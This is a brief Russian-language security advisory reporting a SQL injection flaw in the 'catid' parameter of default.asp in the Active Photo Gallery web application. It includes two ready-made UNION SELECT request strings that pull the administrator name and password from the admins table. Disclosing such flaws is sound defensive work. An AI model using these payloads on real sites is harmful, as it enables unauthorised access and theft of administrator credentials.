Программа: Active Photo Gallery

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «catid» сценарием default.asp. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.

Примеры:

Username : /default.asp?catid=-1+union+select+0,adminname,2+from+admins%20where%20adminid=1
Password : /default.asp?catid=-1+union+select+0,password,2+from+admins%20where%20adminid=1



Оставить мнение